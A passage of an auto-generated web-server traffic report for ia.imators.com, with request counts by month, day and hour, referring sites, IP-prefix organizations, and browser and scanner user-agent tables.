alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2024</td><td class="R">141</td><td class="P">97</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2024</td><td class="R">45</td><td class="P">41</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sep 2024</td><td class="R">148</td><td class="P">82</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Oct 2024</td><td class="R">24</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Nov 2024</td><td class="R">59</td><td class="P">31</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">26</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">63</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: May 2024 (101 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">93</td><td class="P">75</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">93</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">94</td><td class="P">72</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">96</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">142</td><td class="P">73</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">104</td><td class="P">85</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">115</td><td class="P">71</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">22</td><td class="P">20</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">28</td><td class="P">24</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">35</td><td class="P">15</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 3</td><td class="R">16</td><td class="P">14</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 4</td><td class="R">26</td><td class="P">20</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">25</td><td class="P">16</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 6</td><td class="R">28</td><td class="P">22</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">18</td><td class="P">16</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 8</td><td class="R">43</td><td class="P">31</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x"> 9</td><td class="R">31</td><td class="P">25</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">28</td><td class="P">27</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">17</td><td class="P">17</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">27</td><td class="P">21</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">30</td><td class="P">28</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">16</td><td class="P">16</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">15</td><td class="R">16</td><td class="P">10</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">22</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">18</td><td class="R">23</td><td class="P">17</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">20</td><td class="P">13</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">9</td><td class="P">9</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">15</td><td class="P">11</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">22</td><td class="R">198</td><td class="P">84</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">37</td><td class="P">21</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">737</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">59</td><td class="b"> 8.70%</td><td class="xl">205.169</td></tr> <tr><td class="R">49</td><td class="b"> 5.49%</td><td class="xl">104</td></tr> <tr><td class="R">40</td><td class="b"> 7.04%</td><td class="xl">198.235</td></tr> <tr><td class="R">39</td><td class="b"> 5.21%</td><td class="xl">34</td></tr> <tr><td class="R">39</td><td class="b"> 5.70%</td><td class="xl">35</td></tr> <tr><td class="R">37</td><td class="b"> 7.37%</td><td class="xl">205.210</td></tr> <tr><td class="R">23</td><td class="b"> 3.63%</td><td class="xl">3</td></tr> <tr><td class="R">22</td><td class="b"> 3.60%</td><td class="xl">45</td></tr> <tr><td class="R">21</td><td class="b">10.50%</td><td class="xl">106</td></tr> <tr><td class="R">20</td><td class="b"> 2.89%</td><td class="xl">47</td></tr> <tr><td class="R">16</td><td class="b"> 2.11%</td><td class="xl">54</td></tr> <tr><td class="R">14</td><td class="b"> 0.60%</td><td class="xl">195.211</td></tr> <tr><td class="R">12</td><td class="b"> 0.98%</td><td class="xl">167.94</td></tr> <tr><td class="R">11</td><td class="b"> 1.26%</td><td class="xl">51</td></tr> <tr><td class="R">11</td><td class="b"> 1.49%</td><td class="xl">65.154</td></tr> <tr><td class="R">11</td><td class="b"> 0.94%</td><td class="xl">207.241</td></tr> <tr><td class="R">11</td><td class="b"> 0.94%</td><td class="xl">87</td></tr> <tr><td class="R">11</td><td class="b"> 0.93%</td><td class="xl">64.227</td></tr> <tr><td class="R">10</td><td class="b"> 1.29%</td><td class="xl">168.151</td></tr> <tr><td class="R">10</td><td class="b"> 1.69%</td><td class="xl">92</td></tr> <tr><td class="R">271</td><td class="b">27.66%</td><td class="xl">[not listed: 78 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">36</td><td class="xl"><a href="http://www.ia.imators.com/">http://www.ia.imators.com/</a></td></tr> <tr><td class="R">20</td><td class="xl"><a href="https://www.ia.imators.com/">https://www.ia.imators.com/</a></td></tr> <tr><td class="R">15</td><td class="xl"><a href="http://ia.imators.com/">http://ia.imators.com/</a></td></tr> <tr><td class="R">7</td><td class="xl"><a href="https://ia.imators.com/">https://ia.imators.com/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://www.ia.imators.com/cgi-bin/">https://www.ia.imators.com/cgi-bin/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">75</td><td class="xl">http://www.ia.imators.com/</td></tr> <tr><td class="R">24</td><td class="xl">https://www.ia.imators.com/</td></tr> <tr><td class="R">4</td><td class="xl">https://ia.imators.com/</td></tr> <tr><td class="R">4</td><td class="xl">http://ia.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://webdisk.birkenheaddrill.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://158.193.145.151/</td></tr> <tr><td class="R">1</td><td class="xl">http://p7g6av7v.hongch.cn/</td></tr> <tr><td class="R">1</td><td class="xl">http://www.kaylanicoledigitalmarketing.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.gestionpl.ca/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.521qquu58.xyz/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.27.248.198/</td></tr> <tr><td class="R">1</td><td class="xl">https://27.6.173.252/</td></tr> <tr><td class="R">1</td><td class="xl">http://uwcuapimanagement.configuration.azure-api.net/</td></tr> <tr><td class="R">1</td><td class="xl">https://clatsopcomputersolutions.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.blog.davideramirez.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://194.87.217.15/</td></tr> <tr><td class="R">1</td><td class="xl">https://mail.mgbacgiang3s.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://parkerjconstruction.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.24.179.113/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.wjui.net/</td></tr> <tr><td class="R">1</td><td class="xl">http://156.237.46.172/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com</td></tr> <tr><td class="R">36</td><td class="P">36</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</td></tr> <tr><td class="R">35</td><td class="P">35</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</td></tr> <tr><td class="R">29</td><td class="P">29</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">25</td><td class="P">25</td><td class="xl">Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36</td></tr> <tr><td class="R">22</td><td class="P">22</td><td class="xl">Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0</td></tr> <tr><td class="R">16</td><td class="P">16</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">11</td><td class="P">11</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">16</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 (scanner.ducks.party)</td></tr> <tr><td class="R">38</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">curl/7.61.1</td></tr> <tr><td class="R">14</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">11</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.2; rb.gy/oupwis) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">19</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/cfa2980 warc/v0.8.47</td></tr> <tr><td class="R">9</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">python-requests/2.27.1</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/08ba828 warc/v0.8.48</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/ae4878c warc/v0.8.39</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/52b2551 warc/v0.8.38</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36</td></tr> <tr><td class="R">197</td><td class="P">50</td><td class="xl">[not listed: 111 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">420</td><td class="P">255</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">385</td><td class="P">239</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">10</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">17</td><td class="P">4</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">2</td><td class="xl"> Safari/534</td></tr> <tr><td class="N">2</td><td class="R">104</td><td class="P">80</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">43</td><td class="P">43</td><td class="xl"> Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains</td></tr> <tr><td class="N">4</td><td class="R">45</td><td class="P">32</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">28</td><td class="P">24</td><td class="xl"> Firefox/120</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/130</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/83</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> Firefox/4</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/24</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/35</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Firefox/125</td></tr> <tr><td class="N">5</td><td class="R">16</td><td class="P">16</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">16</td><td class="P">16</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">6</td><td class="R">7</td><td class="P">7</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">7</td><td class="P">7</td><td class="xl"> curl/7</td></tr> <tr><td class="N">7</td><td class="R">12</td><td class="P">6</td><td class="xl">Mozilla</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">9</td><td class="P">4</td><td class="xl"> Mozilla/1</td></tr> <tr><td class="N">8</td><td class="R">2</td><td class="P">2</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N">9</td><td class="R">11</td><td class="P">1</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td 